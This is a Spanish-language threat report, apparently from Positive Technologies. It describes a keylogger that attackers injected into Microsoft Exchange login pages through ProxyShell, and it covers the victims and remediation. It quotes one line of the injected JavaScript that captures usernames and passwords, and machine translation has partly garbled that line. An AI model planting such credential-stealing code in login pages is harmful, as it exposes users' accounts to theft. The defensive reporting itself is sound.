Mientras respondía a un incidente, el equipo de respuesta a incidentes de Positive Technologies Expert Security Center (PT ESC) descubrió un registrador de teclas desconocido incrustado en la página principal de Microsoft Exchange Server de uno de nuestros clientes. Este keylogger recopilaba las credenciales de la cuenta en un archivo al que se podía acceder a través de una ruta especial desde Internet. El equipo identificó a más de 30 víctimas, la mayoría de las cuales estaban vinculadas a agencias gubernamentales de varios países. Según nuestros datos, el primer ataque se produjo en 2021. Sin datos adicionales, no podemos atribuir estos ataques a un grupo específico; sin embargo, la mayoría de las víctimas se encuentran en África y Oriente Medio.
Escenario de ataque
Para inyectar al ladrón, los piratas informáticos aprovecharon ProxyShell, una conocida vulnerabilidad de Microsoft Exchange Server. Luego, agregaron el código del keylogger a la página principal del servidor.
Este es el código que los piratas informáticos insertan en la página principal de Microsoft Exchange Server, en particular, en la función clkLgn() :
var ObjectData = "ObjectType=" + escape(curTime + "\t" + gbid("nombre de usuario").valor + "\t" + gbid("contraseña").valor) + "&uin=" + Math.random( ).toString(16).substring(2);
Así es como se ve en la página principal:
Además, en el archivo logon.aspx , los piratas informáticos agregaron un código que procesa el resultado del trabajo del ladrón y redirige las credenciales de la cuenta a un archivo accesible desde Internet.
Como resultado de la ejecución del código que se muestra en la Figura 2, los atacantes obtuvieron acceso a las siguientes credenciales de usuario:
Víctimas
Hemos identificado a más de 30 víctimas, predominantemente agencias gubernamentales de varios países. La lista de víctimas también incluye bancos, empresas de TI e instituciones educativas. Los países afectados por estos ataques incluyen Rusia, Emiratos Árabes Unidos, Kuwait, Omán, Níger, Nigeria, Etiopía, Mauricio, Jordania y Líbano. Todas las víctimas han sido notificadas de la infracción.
Recomendaciones
Puede comprobar si hay un posible compromiso buscando el código de ladrón en la página principal de su servidor Microsoft Exchange (consulte la Figura 1). Si su servidor se ha visto comprometido, identifique los datos de la cuenta que han sido robados y elimine el archivo donde los piratas informáticos almacenan estos datos. Puede encontrar la ruta a este archivo en el archivo logon.aspx (consulte la Figura 2). Asegúrese de estar utilizando la última versión de Microsoft Exchange Server o instale las actualizaciones pendientes.
Si es necesario, los especialistas de PT Expert Security Center están listos para ayudarlo con la investigación.
Fuente: www.ptsecurity.com